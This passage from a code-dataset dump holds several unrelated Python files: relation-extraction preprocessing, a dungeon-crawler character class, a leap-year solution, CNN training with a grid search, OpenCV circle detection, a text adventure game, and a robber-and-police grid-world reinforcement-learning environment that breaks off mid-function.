jieba.add_word('HEAD')\n    jieba.add_word('TAIL')\n    for data in datas:\n        all_datas = data.strip().split('\\t')\n        entity_one = all_datas[0]\n        entity_two = all_datas[1]\n        relation = all_datas[2]\n        text = all_datas[3]\n        if len(entity_two) < len(entity_one):\n            text = text.replace(entity_one, 'HEAD').replace(entity_two, 'TAIL')\n        else:\n            text = text.replace(entity_two, 'TAIL').replace(entity_one, 'HEAD')\n        text = jieba.lcut(text)\n\n        head_pos, tail_pos = text.index('HEAD'), text.index('TAIL')\n\n        text[head_pos] = entity_one\n        text[tail_pos] = entity_two\n\n        entity_ones.append(entity_one)\n        entity_twos.append(entity_two)\n        relations.append(relation)\n        texts.append(text)\n        pos.append([head_pos, tail_pos])\n\n    return entity_ones, entity_twos, relations, pos, texts\n\n\ndef get_pos_feature(sent_len, entities_pos, entity_len, pos_limit):\n    \"\"\"\n    Compute the position encoding: the signed distance of every token to the\n    entity, clipped to [-pos_limit, pos_limit] and shifted into [1, 2 * pos_limit + 1].\n    For example, get_pos_feature(5, 2, 1, 2) returns [1, 2, 3, 4, 5].\n    :param sent_len: length of the tokenized sentence\n    :param entities_pos: token index where the entity starts\n    :param entity_len: number of tokens the entity spans\n    :param pos_limit: maximum absolute relative distance\n    :return: one shifted position id per token\n    \"\"\"\n    left = list(range(-entities_pos, 0))\n    middle = [0] * entity_len\n    right = list(range(1, sent_len - entities_pos - entity_len + 1))\n    pos = left + middle + right\n\n    for i, p in enumerate(pos):\n        if p > pos_limit:\n            pos[i] = pos_limit\n        if p < -pos_limit:\n            pos[i] = -pos_limit\n    pos = [p + pos_limit + 1 for p in pos]\n\n    return pos\n\n\ndef get_mask_feature(sent_len, entities_pos):\n    \"\"\"\n    Compute the mask encoding: 1 for tokens up to and including the first\n    entity, 2 for tokens between the entities, 3 from the second entity on.\n    :param sent_len: length of the tokenized sentence\n    :param entities_pos: [first, second] entity token indices, in ascending order\n    :return: one segment id per token\n    \"\"\"\n    left = [1] * (entities_pos[0] + 1)\n    middle = [2] * (entities_pos[1] - entities_pos[0] - 1)\n    right = [3] * (sent_len - entities_pos[1])\n    return left + middle + right\n\n\ndef build_data(datas, vocab):\n    sents = []\n    head_pos = []\n    tail_pos = []\n    mask_pos = []\n\n    entity_ones, entity_twos, pos, texts = datas\n    for i, sent in enumerate(texts):\n        text = [vocab.word2id.get(word, 0) for word in sent]\n        head, tail = int(pos[i][0]), int(pos[i][1])\n        entities_pos = [head, tail] if tail > head else [tail, head]\n        head_p = get_pos_feature(len(sent), head, 1, config.pos_limit)\n        tail_p = get_pos_feature(len(sent), tail, 1, config.pos_limit)\n        mask_p = get_mask_feature(len(sent), entities_pos)\n\n        sents.append(text)\n        head_pos.append(head_p)\n        tail_pos.append(tail_p)\n        mask_pos.append(mask_p)\n    return sents, head_pos, tail_pos, mask_pos\n\n\ndef get_relation2id(config):\n    path = os.path.join(config.data_path, 'relation2id.txt')\n    pkl_path = os.path.join(config.out_path, 'relation2id.pkl')\n    if os.path.exists(pkl_path):\n        relation2id = load_pkl(pkl_path, 'relation2id')\n    else:\n        relation2id = {}\n        with codecs.open(path, 'r', encoding='utf-8') as f:\n            for line in f.readlines():\n                lines = line.strip().split(' ')\n                relation2id[lines[0]] = int(lines[1])\n        save_pkl(pkl_path, relation2id, 'relation2id')\n    return relation2id\n\n\ndef relation_tokenize(config, relation):\n    relation2id = get_relation2id(config)\n    relations = []\n    for rel in relation:\n        relations.append(relation2id.get(rel, 0))\n    relations = to_categorical(relations, num_classes=config.relation_type, dtype='int32')\n    return relations\n\n\ndef process(config):\n    ensure_dir(config.out_path)\n\n    print('Data preprocessing started')\n    start_time = time.time()\n\n    print('Reading data')\n    train_data = read_file(os.path.join(config.data_path, 'train.txt'))\n    test_data = read_file(os.path.join(config.data_path, 'test.txt'))\n\n    print('Preprocessing data')\n    train_entity_ones, train_entity_twos, train_relations, train_pos, train_texts = get_data(train_data)\n    test_entity_ones, test_entity_twos, test_relations, test_pos, test_texts = get_data(test_data)\n    
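# the relation labels stay out of these lists on purpose; relation_tokenize()\n    # below one-hot encodes them separately with to_categorical\n    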
train_data = [train_entity_ones, train_entity_twos, train_pos, train_texts]\n    test_data = [test_entity_ones, test_entity_twos, test_pos, test_texts]\n\n    all_texts = test_texts + train_texts\n\n    print('Building vocabulary')\n    vocab, vocab_path = build_vocab(all_texts, config.out_path)\n\n    print('Building model inputs')\n    train_sents, train_head_pos, train_tail_pos, train_mask = build_data(train_data, vocab)\n    test_sents, test_head_pos, test_tail_pos, test_mask = build_data(test_data, vocab)\n\n    print('Encoding relation labels')\n    train_relations_token = relation_tokenize(config, train_relations)\n    test_relations_token = relation_tokenize(config, test_relations)\n\n    train_data = (train_sents, train_head_pos, train_tail_pos, train_mask, train_relations_token)\n\n    test_data = (test_sents, test_head_pos, test_tail_pos, test_mask, test_relations_token)\n\n    train_data_path = os.path.join(config.out_path, 'train.pkl')\n    test_data_path = os.path.join(config.out_path, 'test.pkl')\n\n    save_pkl(train_data_path, train_data, 'train_data')\n    save_pkl(test_data_path, test_data, 'test_data')\n\n    end_time = get_time_idf(start_time)\n    print(f'Data preprocessing finished, took {end_time}')\n\n\nif __name__ == '__main__':\n    process(config)\n\n\n\n\n\n\n","repo_name":"qq1065507891/tf2_nre","sub_path":"src/utils/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35275226620","text":"from game.Dice import Dice\nimport Language\n\npage_dialog = Language.dialogs[\"dungeon_crawler\"][\"classes\"][\"game\"][\"character\"]\n\nclass Character:\n\n    def __init__(self, name, maxHealth, force, gold, armor=0):\n        self.name = name\n        self.health = maxHealth\n        self.maxHealth = maxHealth\n        self.force = force\n        self.gold = gold\n        self.armor = armor\n\n    def fight(self, other):\n        attackRoll = Dice().get_value()\n        defenseRoll = Dice().get_value()\n\n        if defenseRoll > attackRoll:\n            print(page_dialog[\"defense_sup_attaque\"] % (self.name, other.name, other.name))\n\n        elif attackRoll == defenseRoll:\n            print(page_dialog[\"defense_equal_attaque\"] % (self.name, other.name))\n            otherDammages = max(0, (self.force / 2) - (other.armor / 10))\n            selfDammages = max(0, (other.force / 2) - (self.armor / 10))\n            other.health -= otherDammages\n            self.health -= selfDammages\n            displayLifePointsLost(self.name, selfDammages)\n            displayLifePointsLost(other.name, otherDammages)\n        else:\n            print(page_dialog[\"defense_inf_attaque\"] % (self.name, other.name))\n            otherDammages = max(0, self.force - (other.armor / 10))\n            other.health -= otherDammages\n            displayLifePointsLost(other.name, otherDammages)\n\n\ndef displayLifePointsLost(characterName, pointsLost):\n    print(page_dialog[\"lose_hp\"] % (characterName, pointsLost), end=\"\\n\\n\")\n","repo_name":"reda-maizate/projet-python","sub_path":"characters/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31264261686","text":"''' https://www.acmicpc.net/problem/2753\t Leap Year\t\t \nProblem\nGiven a year, write a program that prints 1 if the year is a leap year and 0 otherwise. \nA year is a leap year if it is a multiple of 4 but not a multiple of 100, or if it is a multiple of 400.\n\ne.g. 2012 is a multiple of 4 and not a multiple of 100 -> leap year \n1900 is a multiple of 100 but not of 400 -> not a leap year; 2000 is a multiple of 400 -> leap year\n\nInput\nThe first line contains a year. 
The year is a natural number greater than or equal to 1 and less than or equal to 4000.\n\nOutput\nOn the first line, print 1 if the year is a leap year, 0 otherwise.\n\nSample Input 1 \n2000\nSample Output 1 \n1\nSample Input 2 \n1999\nSample Output 2 \n0\n\n\n'''\ndef judge(luna):\n    if (luna % 4 == 0 and luna % 100 != 0) or luna % 400 == 0: return 1\n    return 0\n\nluna = int(input())\n\nprint(judge(luna))\n","repo_name":"2023cote/2022cote_eunseo","sub_path":"implementation/02_2753.py","file_name":"02_2753.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21963110640","text":"from util import *\n\n\ndef define_model(conv_layer_count: int, inflation_type: str, conv_kernel_size: int) -> tf.keras.Model:\n    \"\"\"\n    define and compile a keras model based on the given parameters\n    :param conv_layer_count: number of convolutional layers, including the input layer\n    :param inflation_type: the distribution of filters/neurons over the model: one of\n        'inflating': the input conv layer has 1 filter and every subsequent conv layer doubles the filter count;\n            the dense layer before the output has 16 neurons\n        'deflating': the input conv layer has 4 filters and every subsequent conv layer halves the filter count;\n            the dense layer before the output has 4 neurons\n        the final dense layer always has 1 neuron.\n    :param conv_kernel_size: size of the kernel of all convolutional layers\n    :return: the compiled model\n    \"\"\"\n\n    filter_count = 4 if inflation_type == \"deflating\" else 1\n\n    # model definition\n    model = tf.keras.models.Sequential()\n\n    if conv_layer_count > 0:\n\n        # input layer\n        model.add(tf.keras.layers.Conv2D(filters=filter_count, kernel_size=conv_kernel_size,\n                                         input_shape=(cnn_input_grid_size, cnn_input_grid_size, 1), activation=\"relu\"))\n\n        # hidden layers\n        for _ in range(conv_layer_count - 1):\n            # update filter count according to mode\n            filter_count = filter_count // 2 if inflation_type == \"deflating\" else filter_count * 2\n            # add additional conv layer\n            model.add(tf.keras.layers.Conv2D(filters=filter_count, kernel_size=conv_kernel_size, activation=\"relu\"))\n\n        model.add(tf.keras.layers.Flatten())\n\n    else:\n        # input layer\n        model.add(tf.keras.layers.Flatten(input_shape=(cnn_input_grid_size, cnn_input_grid_size, 1)))\n\n    # last hidden layer\n    model.add(tf.keras.layers.Dense(4 if inflation_type == \"deflating\" else 16, activation=\"relu\"))\n\n    # output layer\n    model.add(tf.keras.layers.Dense(1))\n\n    # compile model and print structural info\n    model.compile(loss=loss_function, optimizer=optimizer_choice, metrics=[loss_function])\n    model.summary()\n\n    return model\n\n\ndef train_model(model: tf.keras.Model, basepath: str) -> tf.keras.Model:\n    \"\"\"\n    trains the given model with early stopping, saving tensorboard logs in the given directory\n    :param model: the model to train\n    :param basepath: directory to save the tensorboard logs and the checkpoints in\n    :return: the trained model\n    \"\"\"\n\n    run_logdir = os.path.abspath(os.path.join(basepath, \"logs\"))\n    # initialize tensorboard with log directory\n    tensorboard_cb = tf.keras.callbacks.TensorBoard(run_logdir, histogram_freq=1)\n\n    # define early stopping and checkpointing callbacks\n    es = tf.keras.callbacks.EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=early_stopping_patience)\n    checkpoint_filepath = os.path.abspath(os.path.join(basepath, 'best_model.h5'))\n    mc = tf.keras.callbacks.ModelCheckpoint(\n        checkpoint_filepath,\n        monitor='val_loss', mode='min', verbose=1, save_weights_only=True, save_best_only=True\n    )\n\n    # prepare train and evaluation data generators\n    training_dataset = 
get_dataset(os.path.join(tfrecord_basepath, TRAIN_VAL_TEST_DESCRIPTORS[0]), batch_size)\n    validation_dataset = get_dataset(os.path.join(tfrecord_basepath, TRAIN_VAL_TEST_DESCRIPTORS[1]), batch_size)\n\n    # train the model\n    model.fit(x=training_dataset, validation_data=validation_dataset, epochs=epochs,\n              steps_per_epoch=train_dataset_size, validation_steps=val_dataset_size,\n              callbacks=[tensorboard_cb, es, mc])\n\n    # restore weights of best checkpoint\n    model.load_weights(checkpoint_filepath)\n\n    return model\n\n\ndef train_one_model_variant(conv_layer_count, inflation_type, conv_kernel_size):\n    \"\"\"\n    creates a model based on the given parameters and trains it, saving it to disk\n    :param conv_layer_count: number of convolutional layers\n    :param inflation_type: the distribution of filters/neurons over the model: one of\n        'inflating': the input conv layer has 1 filter and every subsequent conv layer doubles the filter count;\n            the dense layer before the output has 16 neurons\n        'deflating': the input conv layer has 4 filters and every subsequent conv layer halves the filter count;\n            the dense layer before the output has 4 neurons\n        the final dense layer always has 1 neuron.\n    :param conv_kernel_size: size of the kernel of all convolutional layers\n    :return: nothing, modifies filesystem\n    \"\"\"\n    print(\"\\n\\n\\ntraining model '{}_conv_layers_{}_kernel_size_{}'\\n\\n\\n\".format(\n        conv_layer_count, inflation_type, conv_kernel_size\n    ))\n    # define the model\n    current_model = define_model(conv_layer_count, inflation_type, conv_kernel_size)\n    # prepare path to save model and logs/plots\n    current_basepath = os.path.abspath(\n        \"./models/conv/{}_conv_layers_{}_kernel_size_{}\".format(\n            conv_layer_count, inflation_type, conv_kernel_size\n        )\n    )\n    # train the model\n    current_model = train_model(current_model, current_basepath)\n    # save the model to disk for deployment\n    current_model.save(os.path.abspath(os.path.join(current_basepath, \"model\")), include_optimizer=False)\n\n\nconv_layer_counts = [2, 1, 0]\nconv_kernel_sizes = [7, 3]\ninflation_types = [\"inflating\", \"deflating\"]\n\nif __name__ == \"__main__\":\n    # load train data characteristics\n    with open(\n            os.path.join(tfrecord_basepath, TRAIN_VAL_TEST_DESCRIPTORS[0]) + \"characteristics.txt\", \"r\"\n    ) as input_file:\n        train_dataset_size = int(input_file.readline().split(\" \")[0])\n        print(\"size of training set: {} samples\".format(train_dataset_size))\n        max_grid_size = int(input_file.readline().split(\" \")[0])\n        print(\"maximum occurring BB size: {}x{}\".format(max_grid_size, max_grid_size))\n\n    # load validation data characteristics\n    with open(\n            os.path.join(tfrecord_basepath, TRAIN_VAL_TEST_DESCRIPTORS[1]) + \"characteristics.txt\", \"r\"\n    ) as input_file:\n        val_dataset_size = int(input_file.readline().split(\" \")[0])\n        print(\"size of validation set: {} samples\".format(val_dataset_size))\n\n    # HPO loop (grid search over a few points because of long runtime)\n    for current_conv_layer_count in conv_layer_counts:\n        for current_inflation_type in inflation_types:\n            if current_conv_layer_count > 0:\n                for current_conv_kernel_size in conv_kernel_sizes:\n                    train_one_model_variant(current_conv_layer_count, current_inflation_type, current_conv_kernel_size)\n            else:\n                train_one_model_variant(current_conv_layer_count, current_inflation_type, 
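# -1 is a kernel size placeholder; define_model ignores conv_kernel_size when conv_layer_count == 0\n                                        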
-1)\n\n","repo_name":"TrellixVulnTeam/Bachelor_Arbeit_TD4S","sub_path":"NeuronalNetworks/combined_project/train_model_conv.py","file_name":"train_model_conv.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27710779937","text":"from fletcherfiltering.common.data_generation.BaseGenerator import BaseGenerator\nimport lipsum\nfrom fletcherfiltering import settings\nimport random\n\nclass SentenceGenerator(BaseGenerator):\n\n def generate(self, maxlength: int = settings.VAR_LENGTH) -> str:\n if random.random() < settings.EMPTYSTRINGPROBABILITY:\n return \"\"\n sentence = lipsum.generate_sentences(1)\n if len(sentence) > maxlength:\n indexes = [pos for pos, char in enumerate(sentence) if char == ' ' and pos < maxlength]\n if len(indexes) == 0:\n sentence = sentence[:maxlength]\n else:\n sentence = sentence[:indexes[-1]]\n return sentence\n","repo_name":"abs-tudelft/FletcherFiltering","sub_path":"src/fletcherfiltering/common/data_generation/SentenceGenerator.py","file_name":"SentenceGenerator.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35597905490","text":"import cv2\nimport numpy as np\nfrom collections import deque\nimport tkinter as tk\nfrom tkinter import *\nimport time\nimport math\n\nyellowLower=(29,127,121)\nyellowHigher=(179,255,255)\n\ndef isclose(a,b,maxi):\n if a <= b+maxi and a>=b-maxi:\n return True\n else:\n return False\n\ncap = cv2.VideoCapture(\"data/video2.webm\")\ncircles = []\n\n#inimg = cv2.imread(\"data/salle2.jpg\")\n\n#h = int(inimg.shape[0]/2)\n#w = int(inimg.shape[1]/2)\n#dim = (w,h)\n\n#inimg = cv2.resize(inimg,dim,interpolation=cv2.INTER_AREA)\n\nprevCenter = (0,0)\n\nwhile True:\n\n ret, inimg = cap.read()\n if not ret:\n print(\"error reading video\")\n break\n\n ############################ Circles detection\n\n # Convert to grayscale.\n gray = cv2.cvtColor(inimg, cv2.COLOR_BGR2GRAY)\n # Blur using 3 * 3 kernel.\n gray_blurred = cv2.blur(gray, (3, 3))\n detected_circles = cv2.HoughCircles(gray_blurred, cv2.HOUGH_GRADIENT, 1, 20, param1 = 50, param2 = 30, minRadius = 1, maxRadius = 40)\n\n # only proceed if at least one circle was found\n if detected_circles is not None:\n # Convert the circle parameters a, b and r to integers.\n detected_circles = np.uint16(np.around(detected_circles))\n # store the circles in an array for later\n for pt in detected_circles[0, :]:\n a, b, r = pt[0], pt[1], pt[2]\n cv2.circle(inimg, (a, b), r, (0, 255, 0), 2)\n \n cv2.imshow(\"circles\",inimg)\n #time.sleep(0.03)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Theophile-Wemaere/ball_tracking_cv2","sub_path":"circle_detection.py","file_name":"circle_detection.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23936623762","text":"'''\nCreated on Jan 6, 2016\n\n@author: T0157129\n'''\nimport logging\nimport logging.config\n\n\nfrom Characters.Player import Player\nfrom Prefabs.WorldItems import WorldItems\nfrom Prefabs.EnemyGenerator import EnemyGenerator\nfrom Printer import Printer\nfrom Stories.Story import Story\n\nfrom Utilities import XmlParser as xmlp\nfrom Utilities import UserInteract as ui\nfrom Utilities import Caster as cast\n\n\nimport xml.dom.minidom as minidom\n\n\nclass Game:\n '''\n This class 
represents the whole game.\n    \n    '''\n\n\n    def __init__(self):\n        '''\n        Constructor\n        '''\n#         logging.basicConfig(level=logging.DEBUG, disable_existing_loggers=False)\n#         self.logger = logging.getLogger(__name__)\n        \n        self.gameOver= False\n        \n        \n        self.printer=Printer(self)\n        \n        self.WI= WorldItems()\n        \n        self.player = self.__initPlayer()\n        \n        \n        # Enemies\n        self.EG = EnemyGenerator(self.WI)\n        \n        self.currentEnemy= \"\"\n        \n        \n        self.story = Story( self)\n        \n        self.printer.intro(self.player)\n        self.player.listInventory()\n        raw_input()\n        \n        self.nbTurn = 0\n        \n        print(\"##################################################\")\n        print(\"                  THE GAME BEGINS\")\n        print(\"##################################################\")\n        \n        self.nextEvent = self.story.goToEvent(\"intro\")\n        \n        \n    '''\n    void onTurn()\n    '''    \n    def onTurn(self):\n        self.nbTurn = self.nbTurn +1\n        \n        self.nextEvent = self.story.goToEvent(self.nextEvent)\n        \n        \n        \n    '''\n    boolean onGame()\n    Return true while the player isn't dead.\n    '''    \n    def onGame(self):\n        return self.player.isAlive() and self.nbTurn<20\n    \n    \n    def endGame(self):\n        print(\"##################################################\")\n        print(\"                  THE GAME ENDS\")\n        print(\"##################################################\")\n        self.gameOver= True\n        \n    def isGameOver(self):\n        return self.gameOver\n    \n    \n    '''\n    Return a player object.\n    '''\n    def __initPlayer(self):\n        \n        dictMode={} #will contain all information about each game mode\n        file = minidom.parse(\"./XML_Files/InitPlayer.xml\")\n        modes = file.getElementsByTagName(\"DifficultyMode\")\n        for mode in modes:\n            data= xmlp.parseAttributes(mode) \n            dictMode[data.get('id')]= data\n        \n        #Ask the player which mode they want to play\n        ToPrint=\"Difficulty Modes: \"\n        for mode in dictMode.keys():\n            ToPrint= ToPrint + ' ' + mode\n        \n        print(ToPrint)\n        \n        #Parse the user input\n        userMode = ui.userIput(\"Which mode do you want to play? \", dictMode.keys())\n        SelectedMode = dictMode[userMode]\n        \n        ## Parse the mode's parameters\n        player = Player(SelectedMode.get('hp'))\n        \n        armorName =SelectedMode.get('armor') \n        if armorName is None:\n            player.equipArmor(self.WI.getArmorByCategory(\"basic\"))\n        else:\n            player.equipArmor(self.WI.getArmor(armorName))\n        \n        weaponName = SelectedMode.get('weapon')\n        if weaponName is None:\n            player.equipWeapon(self.WI.getWeaponByCategory(\"basic\"))\n        else:\n            player.equipWeapon(self.WI.getWeapon(weaponName))\n        \n        potion = self.WI.getPotionByCategory(\"HP\")\n        if SelectedMode.get('potion') is not None:\n            if cast.strToBool(SelectedMode.get('potion')): \n                potion.fill()\n                player.addToBag(potion)\n        \n        return player","repo_name":"vyrval/GYATH","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37159063307","text":"''' Class for Bank environment. 
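\nA robber (the agent) moves around a grid-shaped town while a police officer\nperforms a random walk; the joint state is the pair (robber position, police\nposition), and the robber is caught as soon as the two positions coincide.\n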
'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom IPython import display\nfrom random import choice\nimport time\nfrom copy import deepcopy\nfrom itertools import product\n\n# Some colours\nLIGHT_RED = '#FFC4CC'\nLIGHT_GREEN = '#95FD99'\nBLACK = '#000000'\nWHITE = '#FFFFFF'\nLIGHT_PURPLE = '#E8D0FF'\nLIGHT_ORANGE = '#FAE0C3'\n\n\nclass Bank:\n\n # Actions\n STAY = 0\n MOVE_LEFT = 1\n MOVE_RIGHT = 2\n MOVE_UP = 3\n MOVE_DOWN = 4\n\n # Give names to actions\n actions_names = {\n STAY: \"stay\",\n MOVE_LEFT: \"move left\",\n MOVE_RIGHT: \"move right\",\n MOVE_UP: \"move up\",\n MOVE_DOWN: \"move down\"\n }\n\n # Reward values\n IN_BANK_REWARD = 1\n IMPOSSIBLE_REWARD = -100\n CAUGHT_REWARD = -10\n\n\n def __init__(self, grid):\n \"\"\" Constructor of the environment Bank (and town).\n \"\"\"\n # Town attributes\n self.grid = grid\n self.start = tuple(np.argwhere(grid == 1).reshape(1,-1)[0])\n self.money = tuple(np.argwhere(grid == 3).reshape(1, -1)[0])\n self.coords = [(x, y) for x, y in np.ndindex(self.grid.shape)]\n # Robber attributes\n self.caught = False\n self.actions = self.__actions()\n self.n_actions = len(self.actions)\n self.id2states, self.states2id = self.__states()\n self.n_states = len(self.id2states)\n # Police attributes\n self.e_start = tuple(np.argwhere(grid == 2).reshape(1, -1)[0])\n self.e_actions = self.__enemyActions()\n self.e_id2states, self.e_states2id = self.__enemyStates()\n self.e_n_states = len(self.e_id2states)\n # Joint states\n self.id2jointStates, self.jointStates2id = self.__jointStates()\n self.n_jointStates = len(self.id2jointStates)\n # We are oblivious to the good / bad states at first\n # Losing states are those when player pos == police pos\n self.losingStates = self.__losingStates()\n self.winningStates = []\n\n def __actions(self):\n actions = dict()\n actions[self.STAY] = (0, 0)\n actions[self.MOVE_LEFT] = (0,-1)\n actions[self.MOVE_RIGHT] = (0, 1)\n actions[self.MOVE_UP] = (-1,0)\n actions[self.MOVE_DOWN] = (1,0)\n return actions\n\n def __states(self):\n coords = [(i, (x, y)) for i, (x, y) in enumerate(np.ndindex(self.grid.shape))]\n # Mapping from index state to x,y coordinates\n id2states = dict([(i, s) for i, s in (coords)])\n # Invert mapping from coordinates to index\n states2id = {v: k for k, v in id2states.items()}\n return id2states, states2id\n\n def __losingStates(self):\n # Get indexes of states that are at the same position\n idx = set([i for i, A in enumerate(\n self.id2jointStates.values()) if A[0] == A[1]])\n return idx\n\n def __enemyStates(self):\n id2states = dict([(i, s) for i, s in enumerate(self.coords)])\n states2id = {v: k for k, v in id2states.items()}\n return id2states, states2id\n \n def __enemyActions(self):\n e_actions = deepcopy(self.actions)\n # Enemy not allowed to stay\n del e_actions[0]\n return e_actions\n\n def __e_possibleMoves(self, position):\n possible_act = []\n for idx, action in self.e_actions.items():\n row = position[0] + action[0]\n col = position[1] + action[1]\n hitting_maze_walls = (row == -1) or (row == self.grid.shape[0]) or \\\n (col == -1) or (col == self.grid.shape[1])\n if not hitting_maze_walls:\n possible_act.append(idx)\n return possible_act\n\n def __jointStates(self):\n id2jointStates = dict([(i, s) for i, s in \\\n enumerate(product(self.states2id.keys(), self.e_states2id.keys()))])\n jointStates2id = {v: k for k, v in id2jointStates.items()}\n # [(a,b) for a, b in product(self.id2states.keys(), self.e_id2states.keys())]\n return id2jointStates, jointStates2id\n\n def 
__move(self, state, action=None):\n        \"\"\" Makes a step in the grid, given a current position and an action.\n            If the action STAY or an inadmissible action is used, the agent stays in place.\n            :return tuple next_cell: Position (x,y) on the grid that agent transitions to.\n        \"\"\"\n        # Random action\n        if action == None:\n            action = choice(list(self.actions.keys()))\n        # Compute the future position given current (state, action)\n        row = state[0] + self.actions[action][0]\n        col = state[1] + self.actions[action][1]\n        # Is the future position an impossible one ?\n        hitting_maze_walls = (row == -1) or (row == self.grid.shape[0]) or \\\n                             (col == -1) or (col == self.grid.shape[1])\n        # Return both (x,y) and index state\n        if hitting_maze_walls:\n            return state, self.states2id[state]\n        else:\n            return (row, col), self.states2id[(row, col)]\n\n    def __e_move(self, state, action=None):\n        \"\"\" Makes a step in the grid, given a current position and an action.\n            If the action STAY or an inadmissible action is used, the agent stays in place.\n            :return tuple next_cell: Position (x,y) on the grid that agent transitions to.\n        \"\"\"\n        # Random action\n        if action == None:\n            action = choice(list(self.e_actions.keys()))\n        # Compute the future position given current (state, action)\n        row = state[0] + self.e_actions[action][0]\n        col = state[1] + self.e_actions[action][1]\n        # Is the future position an impossible one ?\n        outside_maze = (row == -1) or (row == self.grid.shape[0]) or \\\n                       (col == -1) or (col == self.grid.shape[1])\n        # Based on the impossibility check return the next state.\n        while outside_maze:\n            # The enemy cannot choose a wrong position. Try another one.\n            action = choice(list(self.e_actions.keys()))\n            row = state[0] + self.e_actions[action][0]\n            col = state[1] + self.e_actions[action][1]\n            outside_maze = (row == -1) or (row == self.grid.shape[0]) or \\\n                           (col == -1) or (col == self.grid.shape[1])\n        # return np.ravel_multi_index((row, col), dims=self.grid.shape)\n        return (row, col), self.e_states2id[(row, col)]\n\n\n    def simulate(self, policy, tlimit, player=None, police=None):\n\n        path, path_enemy = [], []\n        t = 0\n\n        if player == None:\n            s, _ = self.start, self.states2id[self.start]\n        else:\n            s, _ = player, self.states2id[player]\n        if police == None:\n            e_s, _ = self.e_start, self.e_states2id[self.e_start]\n        else:\n            e_s, _ = police, self.e_states2id[police]\n\n        # Add the starting position in the grid to the path\n        path.append(s)\n        path_enemy.append(e_s)\n\n        while t < tlimit-1 and not self.caught:\n\n            i = self.jointStates2id[(s, e_s)]\n            # Move to next state given the policy and the current state\n            next_s, _ = self.__move(s, policy[i])\n            path.append(next_s)\n            # Move enemy\n            next_e_s, _ = self.__e_move(e_s)\n            path_enemy.append(next_e_s)\n\n            if next_s == next_e_s:\n                self.caught = True\n                # Add again paths for the visualization function\n                path.append(next_s)\n                path_enemy.append(next_e_s)\n\n            # Update time and state for next iteration\n            t += 1\n            s = next_s\n            e_s = next_e_s\n\n        return path, path_enemy\n\n    def show(self):\n        print('The states are :')\n        print(self.id2states)\n        print('The actions are:')\n        print(self.actions)\n        print('The mapping of the states:')\n        print(self.states2id)\n        # print('The rewards:')\n        # print(self.R)\n\n\ndef draw_maze(grid):\n\n    # Map a color to each cell in the grid\n    col_mapp = {0: WHITE, 1: BLACK,\n                2: LIGHT_GREEN, 3: LIGHT_ORANGE, -1: LIGHT_RED}\n\n    # Give a color to each cell\n    rows, cols = grid.shape\n    
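# grid codes, as used in Bank.__init__: 0 empty, 1 robber start, 2 police start, 3 bank\n    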
colored_maze = [[col_mapp[grid[j, i]]\n                    for i in range(cols)] for j in range(rows)]\n\n    # Create figure of the size of the grid\n    fig = plt.figure(1, figsize=(cols, rows))\n\n    # Remove the axis ticks and add a title\n    ax = plt.gca()\n    ax.set_title('The Maze')\n    ax.set_xticks([])\n    ax.set_yticks([])\n\n    # Create a table to color\n    grid = plt.table(cellText=None,\n                     cellColours=colored_maze,\n                     cellLoc='center',\n                     loc=(0, 0),\n                     edges='closed')\n    # Modify the height and width of the cells in the table\n    tc = grid.properties()['child_artists']\n    for cell in tc:\n        cell.set_height(1.0/rows)\n        cell.set_width(1.0/cols)\n\n\ndef animate_solution(grid, path, path_enemy=None):\n\n    # Map a color to each cell in the grid\n    col_mapp = {0: WHITE, 1: BLACK,\n                2: LIGHT_GREEN, 3: LIGHT_ORANGE, -1: LIGHT_RED}\n\n    # Size of the grid\n    rows, cols = grid.shape\n\n    # Create figure of the size of the grid\n    fig = plt.figure(1, figsize=(cols, rows))\n\n    # Remove the axis ticks and add a title\n    ax = plt.gca()\n    ax.set_title('Policy simulation')\n    ax.set_xticks([])\n    ax.set_yticks([])\n\n    # Give a color to each cell\n    colored_maze = [[col_mapp[grid[j, i]]\n                     for i in range(cols)] for j in range(rows)]\n\n    # Create a table to color\n    grid = plt.table(cellText=None,\n                     cellColours=colored_maze,\n                     cellLoc='center',\n                     loc=(0, 0),\n                     edges='closed')\n\n    # Modify the height and width of the cells in the table\n    tc = grid.properties()['child_artists']\n    for cell in tc:\n        cell.set_height(1.0/rows)\n        cell.set_width(1.0/cols)\n\n    # Update the color at each frame\n    for i in range(len(path)):\n        grid.get_celld()[(path[i])].set_facecolor(LIGHT_GREEN)\n        grid.get_celld()[(path[i])].get_text().set_text('Robber')\n        grid.get_celld()[(path_enemy[i])].set_facecolor(LIGHT_RED)\n        grid.get_celld()[(path_enemy[i])].get_text().set_text('Police')\n        if i > 0:\n            # Re-initialize previous cells\n            grid.get_celld()[(path[i-1])].set_facecolor(WHITE)\n            grid.get_celld()[(path[i-1])].get_text().set_text('')\n            grid.get_celld()[(path_enemy[i-1])].set_facecolor(WHITE)\n            grid.get_celld()[(path_enemy[i-1])].get_text().set_text('')\n\n            # if waiting but not at the end of the path\n            if path[i] == path[i-1]:\n                if i != len(path)-1:\n                    grid.get_celld()[(path[i])].set_facecolor(LIGHT_PURPLE)\n                    grid.get_celld()[(path[i])].get_text().set_text(\n                        'Stealing')\n                else:\n                    grid.get_celld()[(path[i])].set_facecolor(LIGHT_GREEN)\n                    grid.get_celld()[(path[i])].get_text().set_text(\n                        'Win !')\n                    break\n\n            if path[i] == 